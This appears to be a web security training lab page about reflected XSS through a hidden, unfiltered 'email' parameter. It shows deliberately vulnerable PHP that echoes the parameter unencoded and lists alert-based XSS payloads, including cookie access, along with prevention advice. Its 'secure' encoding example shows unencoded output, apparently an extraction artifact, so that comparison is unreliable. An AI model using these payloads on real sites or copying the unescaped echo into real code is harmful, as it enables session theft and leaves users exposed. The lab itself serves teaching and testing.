KrazePlanetLabs - Email Parameter XSS Lab

Email Parameter Challenge

Lab Overview

This lab demonstrates a common vulnerability where email parameters are often left unfiltered, assuming they will only contain email addresses. This creates a perfect opportunity for XSS attacks.

Unfiltered Email Parameter: The email parameter has no filtering or encoding, making it highly vulnerable to XSS attacks.

Hidden Parameter: There's a hidden parameter not shown in the main form. Use tools like Arjun to discover it!

# use arjun tool to find hidden parameter

Parameter Security Levels:

Secure fname, lname - Uses htmlspecialchars()

Vulnerable email - No filtering (direct output)

Common Mistake Email fields often lack proper validation

Context Output context affects exploitability

Security Comparison:

Secure Parameters (fname, lname):

Input: <script>alert(1)</script>

Output: <script>alert(1)</script>

Vulnerable Parameter (email):

Input: <script>alert(1)</script>

Output: <script>alert(1)</script>

The email parameter directly outputs user input without any filtering, making XSS attacks possible.

Overall Security Level: Critical Vulnerability

Objective: Discover the hidden email parameter and exploit the lack of filtering to execute XSS payloads.

Backend Source Code

if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["email"])){
    echo $_GET["email"];
}
# use arjun tool to find hidden parameter

Test Input Forms

Visible Parameters (HTML Encoded)

Hidden Parameter

Hint: The 'email' parameter is not shown in the main form but is implemented in the backend without any filtering.

XSS Payload Examples for Email Parameter

Basic Script Tags:

<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

Event Handlers:

<img src=x onerror=alert(1)>
<body onload=alert(1)>
<svg onload=alert(1)>

JavaScript Protocol:

<a href="javascript:alert(1)">click</a>
<iframe src="javascript:alert(1)"></iframe>
<form action="javascript:alert(1)"><input type=submit></form>

Advanced Techniques:

<script src="data:text/javascript,alert(1)"></script>
<object data="javascript:alert(1)"></object>
<embed src="javascript:alert(1)"></embed>

Security Implications

Unfiltered email parameters demonstrate:

Email fields are often overlooked in security testing
Assumptions about input format create security gaps
Inconsistent security controls across parameters
Even a single unfiltered parameter can compromise the entire application
Email parameters are common in web applications
Proper validation and encoding must be applied to ALL user inputs

Best Practices

For secure web applications:

Apply context-aware output encoding to ALL parameters
Validate email format using proper regex patterns
Implement strict Content Security Policy (CSP) headers
Use input validation with whitelist approaches
Conduct comprehensive security testing on all parameters
Use security headers: X-XSS-Protection, X-Content-Type-Options
Never trust user input, regardless of the field name

Real-World Attack Scenarios

Common Email XSS Vectors:

Contact forms: Email fields in contact forms
Registration forms: Email during user registration
Newsletter signups: Email collection forms
Password reset: Email fields in recovery forms

Impact of Email XSS:

Session hijacking through cookie theft
Account takeover attacks
Phishing attacks from within the application
Malware distribution
Defacement of application content

Prevention Strategies:

Input validation: Validate email format with regex: /^[^\s@]+@[^\s@]+\.[^\s@]+$/
Output encoding: Always encode before output
Content Security Policy: Implement strict CSP headers
Security testing: Include email fields in security scans